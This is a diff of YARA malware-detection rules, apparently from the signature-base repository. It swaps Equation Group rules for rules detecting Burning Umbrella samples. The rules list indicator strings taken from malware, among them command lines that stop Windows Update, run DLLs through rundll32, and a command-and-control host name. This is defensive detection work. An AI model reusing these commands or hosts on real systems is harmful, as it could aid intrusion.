+		$s3 = "\\temp\\s%d.dat" ascii
+		$s4 = "cmd /c net stop wuauserv" fullword ascii
+		$s5 = "User-Agent: MyApp/0.1" fullword ascii
+		$s6 = "%s->%s Fails : %d" fullword ascii
+		$s7 = "Enter WorkThread,Current sock:%d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 350000 and ( ( $z1 ) or ( all of ( $s* ) and 6 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and ( ( pe.exports ( "Print32" ) and 2 of them ) or 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_GROK_Keylogger : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_6 : FILE
 {
 	meta:
-		description = "Equation Group Malware - GROK keylogger"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1bae3e86-54e5-55e9-8bbd-aa9ec2a0fa2b"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L140-L172"
+		id = "7198a734-fd54-5cb5-9966-b91796a415c7"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L101-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
-		logic_hash = "502afd23b92e948a8fba33ccc4da2f4b1ec91bce5a24d153ffc545129fd8c9fa"
+		logic_hash = "ee671bc09cc0c84c9817ed800f1416a75f18a70fd2cf6a7e9f063fffa01fa003"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "49ef2b98b414c321bcdbab107b8fa71a537958fe1e05ae62aaa01fe7773c3b4b"
 
 	strings:
-		$s0 = "c:\\users\\rmgree5\\" ascii
-		$s1 = "msrtdv.sys" fullword wide
-		$x1 = "svrg.pdb" fullword ascii
-		$x2 = "W32pServiceTable" fullword ascii
-		$x3 = "In forma" fullword ascii
-		$x4 = "ReleaseF" fullword ascii
-		$x5 = "criptor" fullword ascii
-		$x6 = "astMutex" fullword ascii
-		$x7 = "ARASATAU" fullword ascii
-		$x8 = "R0omp4ar" fullword ascii
-		$z1 = "H.text" fullword ascii
-		$z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" wide
-		$z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
+		$s1 = "ExecuteFile=\"hidcon:nowait:\\\"Word\\\\r.bat\\\"\"" fullword ascii
+		$s2 = "InstallPath=\"%Appdata%\\\\Microsoft\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250000 and ( $s0 or ( $s1 and 6 of ( $x* ) ) or ( 6 of ( $x* ) and all of ( $z* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Greyfishinstaller
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_7 : FILE
 {
 	meta:
-		description = "Equation Group Malware - Grey Fish"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea16b51c-755e-5f08-a209-d21a1ed30fcf"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L174-L189"
+		id = "7e427512-a8ee-53ae-a141-e995e74ca845"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L117-L130"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
-		logic_hash = "dae6963f3210503c6c86c818a9cd6f309ba7876f14ca42966097023d474a2366"
+		logic_hash = "115774c17003408a04e4b2678f32392b5439b55f3d4688476f6f877520acf75d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "DOGROUND.exe" fullword wide
-		$s1 = "Windows Configuration Services" fullword wide
-		$s2 = "GetMappedFilenameW" fullword ascii
+		hash1 = "a4ce3a356d61fbbb067e1430b8ceedbe8965e0cfedd8fb43f1f719e2925b094a"
+		hash2 = "a8bfc1e013f15bc395aa5c047f22ff2344c343c22d420804b6d2f0a67eb6db64"
+		hash3 = "959612f2a9a8ce454c144d6aef10dd326b201336a85e69a604e6b3892892d7ed"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "f5b113d6708a3927b5cc48f2215fcaff"
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Equationdruginstaller : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_8 : FILE
 {
 	meta:
-		description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fa549e6e-f0d8-55ea-9ec9-c8ec53b55dec"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L191-L213"
+		id = "1b89d5a1-1425-5cb7-b429-563769bc0943"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L132-L145"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
-		logic_hash = "815ed47a53bbc5f6c3fec3464336863028e804bde4681526ecac5de0cfff21b4"
+		logic_hash = "1a42667463ff006b155c93b8986ab75441ba00d0c3c146c2d4c6929250627d8d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "73270fe9bca94fead1b5b38ddf69fae6a42e574e3150d3e3ab369f5d37d93d88"
 
 	strings:
-		$s0 = "\\system32\\win32k.sys" wide
-		$s1 = "ALL_FIREWALLS" fullword ascii
-		$x1 = "@prkMtx" fullword wide
-		$x2 = "STATIC" fullword wide
-		$x3 = "windir" fullword wide
-		$x4 = "cnFormVoidFBC" fullword wide
-		$x5 = "CcnFormSyncExFBC" fullword wide
-		$x6 = "WinStaObj" fullword wide
-		$x7 = "BINRES" fullword wide
+		$s1 = "cmd /c open %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500000 and all of ( $s* ) and 5 of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Equationlaserinstaller : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_10 : FILE
 {
 	meta:
-		description = "Equation Group Malware - EquationLaser Installer"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15fd5668-36f2-556c-8150-225d3cbd4121"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L215-L236"
+		id = "e4cb2211-efbe-55f9-99e3-c01601904509"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L147-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
-		logic_hash = "6f8ba26f5efaa7ec422171862e1b645472387395f0be3a4625d58de5f0584c0b"
-		score = 80
+		logic_hash = "14d0ab1114c168d7222a49e68ba12718b6285969e667b95be665d59b1fc98358"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "70992a72412c5d62d003a29c3967fcb0687189d3290ebbc8671fa630829f6694"
+		hash2 = "48f0bbc3b679aac6b1a71c06f19bb182123e74df8bb0b6b04ebe99100c57a41e"
+		hash3 = "5475ae24c4eeadcbd49fcd891ce64d0fe5d9738f1c10ba2ac7e6235da97d3926"
 
 	strings:
-		$s0 = "Failed to get Windows version" fullword ascii
-		$s1 = "lsasrv32.dll and lsass.exe" fullword wide
-		$s2 = "\\\\%s\\mailslot\\%s" fullword ascii
-		$s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
-		$s4 = "lsasrv32.dll" fullword ascii
-		$s6 = "%s %02x %s" fullword ascii
-		$s7 = "VIEWERS" fullword ascii
-		$s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
+		$s1 = "revjj.syshell.org" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and filesize < 250000 and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Fannyworm : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_11 : FILE
 {
 	meta:
-		description = "Equation Group Malware - Fanny Worm"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1b8d1ce6-8926-5aa3-8fba-6a8451d66a7d"
-		date = "2015-02-16"
-		modified = "2023-01-06"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L238-L277"
+		id = "9762c68c-4d69-5d38-aaf4-0048e7404147"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L165-L178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
-		logic_hash = "57e938ba1e53eeb99491547f53086eae3fc4d50bc5612e1b5ae6da6b029ac49e"
-		score = 80
+		logic_hash = "847681b3e9d4fc38c483663f5a7e16e7f8f95cfa77728d7316edbe6fbf5fe2c1"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "278e9d130678615d0fee4d7dd432f0dda6d52b0719649ee58cbdca097e997c3f"
 
 	strings:
-		$s1 = "x:\\fanny.bmp" fullword ascii
-		$s2 = "32.exe" fullword ascii
-		$s3 = "d:\\fanny.bmp" fullword ascii
-		$x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
-		$x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
-		$x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
-		$x4 = "\\system32\\win32k.sys" wide
-		$x5 = "\\AGENTCPD.DLL" ascii
-		$x6 = "agentcpd.dll" fullword ascii
-		$x7 = "PADupdate.exe" fullword ascii
-		$x8 = "dll_installer.dll" fullword ascii
-		$x9 = "\\restore\\" ascii
-		$x10 = "Q:\\__?__.lnk" fullword ascii
-		$x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
-		$x12 = "\\shelldoc.dll" ascii
-		$x13 = "file size = %d bytes" fullword ascii
-		$x14 = "\\MSAgent" ascii
-		$x15 = "Global\\RPCMutex" fullword ascii
-		$x16 = "Global\\DirectMarketing" fullword ascii
+		$s1 = "Resume.app/Contents/Java/Resume.jarPK" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and filesize < 300000 and ( ( 2 of ( $s* ) ) or ( 1 of ( $s* ) and 6 of ( $x* ) ) or ( 14 of ( $x* ) ) )
+		uint16( 0 ) == 0x4b50 and filesize < 700KB and 1 of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_HDD_Reprogramming_Module : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_12 : FILE
 {
 	meta:
-		description = "Equation Group Malware - HDD reprogramming module"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "09ffe270-39e7-5225-b4a9-1c8d312a09c1"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L279-L297"
+		id = "805a00e7-2959-53d8-b769-0f8e54e1bbd5"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L180-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
-		logic_hash = "65800e5f122dce1dd4473bc8cebce0f9258b38d570118b154dbaf6939b68f925"
+		logic_hash = "31798a39d10bfa4520d91e1f555302e9ac4e38d90f8bc27376a5e7e1ccfcc5e1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b9aba520eeaf6511877c1eec5f7d71e0eea017312a104f30d3b8f17c89db47e8"
 
 	strings:
-		$s0 = "nls_933w.dll" fullword ascii
-		$s1 = "BINARY" fullword wide
-		$s2 = "KfAcquireSpinLock" fullword ascii
-		$s3 = "HAL.dll" fullword ascii
-		$s4 = "READ_REGISTER_UCHAR" fullword ascii
+		$s1 = "%SystemRoot%\\System32\\qmgr.dll" fullword ascii
+		$s2 = "rundll32.exe %s,Startup" fullword ascii
+		$s3 = "nvsvcs.dll" fullword wide
+		$s4 = "SYSTEM\\CurrentControlSet\\services\\BITS\\Parameters" fullword ascii
+		$s5 = "http://www.sginternet.net 0" fullword ascii
+		$s6 = "Microsoft Corporation. All rights reserved." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300000 and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and ( pe.exports ( "SvcServiceMain" ) and 5 of them )
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_EOP_Package : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_13 : FILE
 {
 	meta:
-		description = "Equation Group Malware - EoP package and malware launcher"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2eb97873-a415-57be-a8fb-70ef86a99c9b"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L299-L318"
+		id = "38c73425-bbdd-5b74-8ad4-5e0052039dd8"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L203-L215"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
-		logic_hash = "abbc562b8e822422ae1852a5675a680e797a6af0be5581a8482785bd0c1ad1bf"
+		logic_hash = "8cc611685a822e0484146a08f4ebc2fa8dd260dc8627929333060696d8dc35ce"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "abababababab" fullword ascii
-		$s1 = "abcdefghijklmnopq" fullword ascii
-		$s2 = "@STATIC" fullword wide
-		$s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii
-		$s4 = "@prkMtx" fullword wide
-		$s5 = "prkMtx" fullword wide
-		$s6 = "cnFormVoidFBC" fullword wide
+		hash1 = "d31374adc0b96a8a8b56438bbbc313061fd305ecee32a12738dd965910c8890f"
+		hash2 = "c74a8e6c88f8501fb066ae07753efe8d267afb006f555811083c51c7f546cb67"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100000 and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "75f201aa8b18e1c4f826b2fe0963b84f"
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Triplefantasy_Loader : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_14 : FILE
 {
 	meta:
-		description = "Equation Group Malware - TripleFantasy Loader"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "562e7855-f011-5985-91c0-622b2fec32f8"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L320-L342"
+		id = "a2b3a4bb-ca60-5dc2-8124-17e654e326b8"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L217-L231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
-		logic_hash = "f49735a587085e95f1a8e405e42e5ff3eb4beda1f26c7b4c3c0a33bec21f48c7"
+		logic_hash = "37515683804e9aa076a588048713b420501b2aaf6b8617501ef550484abd1c03"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "388ef4b4e12a04eab451bd6393860b8d12948f2bce12e5c9022996a9167f4972"
 
 	strings:
-		$x1 = "Original Innovations, LLC" fullword wide
-		$x2 = "Moniter Resource Protocol" fullword wide
-		$x3 = "ahlhcib.dll" fullword wide
-		$s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii
-		$s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii
-		$s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii
-		$s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii
-		$s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii
-		$s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii
+		$s1 = "C:\\tmp\\Google_updata.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50000 and ( all of ( $x* ) and all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and 1 of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Suspiciousstring : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_15 : FILE
 {
 	meta:
-		description = "Equation Group Malware - suspicious string found in sample"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a5f203a7-0c50-5658-89f4-44533ed4eef0"
-		date = "2015-02-17"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L346-L364"
+		id = "4dc840c1-e6fa-5b21-bfcd-ef07cd85272a"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L233-L248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd7f72c2263a3af9b8c9072b415a3b066e821e000b52ddd684ecb6b80a99067a"
-		score = 60
+		logic_hash = "8541231fe1e48d7130aed64eee964f8eda6792b5dd3e708b98e9cc6f1f620cd0"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "i386\\DesertWinterDriver.pdb" fullword
-		$s2 = "Performing UR-specific post-install..."
-		$s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
-		$s4 = "STRAITSHOOTER30.exe"
-		$s5 = "standalonegrok_2.1.1.1"
-		$s6 = "c:\\users\\rmgree5\\"
+		hash1 = "be6bea22e909bd772d21647ffee6d15e208e386e8c3c95fd22816c6b94196ae8"
+		hash2 = "72a8fa454f428587d210cba0e74735381cd0332f3bdcbb45eecb7e271e138501"
+		hash3 = "9cc38ea106efd5c8e98c2e8faf97c818171c52fa3afa0c4c8f376430fa556066"
+		hash4 = "1a4a64f01b101c16e8b5928b52231211e744e695f125e056ef7a9412da04bb91"
+		hash5 = "3cd42e665e21ed4815af6f983452cbe7a4f2ac99f9ea71af4480a9ebff5aa048"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500000 and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and pe.imphash ( ) == "cc33b1500354cf785409a3b428f7cd2a"
 }
-rule SIGNATURE_BASE_Equationdrug_Networksniffer1
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_16 : FILE
 {
 	meta:
-		description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21a500e7-3011-50e6-b685-f4f65d6dee17"
-		date = "2015-03-11"
-		modified = "2023-01-06"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L368-L388"
+		id = "8b1970bd-571e-5c53-9170-1605c69d9d6d"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L250-L263"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
-		logic_hash = "ec90cba3b790c52f475a08b586f5af5a88ec46cfcf8abd74435981a34dfdb3f7"
+		logic_hash = "2d0ee163e7f6f04bfe6941575d0916e18ce2e5c2426e0af326c9567560df3122"
 		score = 75
-		quality = 35
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "58bb3859e02b8483e9f84cc56fbd964486e056ef28e94dd0027d361383cc4f4a"
 
 	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "\\Registry\\User\\CurrentUser\\" wide
-		$s3 = "sys\\mstcp32.dbg" fullword ascii
-		$s7 = "mstcp32.sys" fullword wide
-		$s8 = "p32.sys" fullword ascii
-		$s9 = "\\Device\\%ws_%ws" wide
-		$s10 = "\\DosDevices\\%ws" wide
-		$s11 = "\\Device\\%ws" wide
+		$s1 = "http://netimo.net 0" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Equationdrug_Compatlayer_Unilaydll : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_17 : FILE
 {
 	meta:
-		description = "EquationDrug - Unilay.DLL"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "32fd31c7-cc44-50e1-8888-b9da59ce587b"
-		date = "2015-03-11"
-		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L390-L402"
+		description = "Detects malware sample from Burning Umbrella report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d79d3f65-f27c-582b-9258-7c84dc7682a6"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L265-L284"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
-		logic_hash = "86434bd0456ea0c9ac9ed74dc3cf63520eb6b880dd4ea7920d0e82873dfec21e"
+		logic_hash = "ca1dc3a03926af15527d2cb95c87457c285891d42a0aa642f49414153bcfc39e"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fa380dac35e16da01242e456f760a0e75c2ce9b68ff18cfc7cfdd16b2f4dec56"
+		hash2 = "854b64155f9ceac806b49f3e352949cc292e5bc33f110d965cf81a93f78d2f07"
+		hash3 = "1e462d8968e8b6e8784d7ecd1d60249b41cf600975d2a894f15433a7fdf07a0f"
+		hash4 = "3cdc149e387ec4a64cce1191fc30b8588df4a2947d54127eae43955ce3d08a01"
+		hash5 = "a026b11e15d4a81a449d20baf7cbd7b8602adc2644aa4bea1e55ff1f422c60e3"
 
 	strings:
-		$s0 = "unilay.dll" fullword ascii
+		$s1 = "syshell" fullword wide
+		$s2 = "Normal.dotm" fullword ascii
+		$s3 = "Microsoft Office Word" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s0
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Equationdrug_Networksniffer2
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_18 : FILE
 {
 	meta:
-		description = "EquationDrug - Network Sniffer - tdip.sys"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "afc5ae23-4965-5796-af3b-9e2705aea455"
-		date = "2015-03-11"
-		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L419-L438"
+		description = "Detects malware sample from Burning Umbrella report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d08f4676-ff28-59be-9fd4-b5a824e577d9"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L286-L313"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
-		logic_hash = "d29744a801194e5488795a8167965b94290be477efe478ee3e71c4bc98733967"
+		logic_hash = "8ec1a1262874f636906186b569d231d6e3dd97ed6ef5cbddcbaf9f80cee301a0"
 		score = 75
-		quality = 35
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d8df60524deb6df4f9ddd802037a248f9fbdd532151bb00e647b233e845b1617"
+		hash2 = "c55cb6b42cfabf0edf1499d383817164d1b034895e597068e019c19d787ea313"
+		hash3 = "32144ba8370826e069e5f1b6745a3625d10f50a809f3f2a72c4c7644ed0cab03"
+		hash4 = "ae616003d85a12393783eaff9778aba20189e423c11c852e96c29efa6ecfce81"
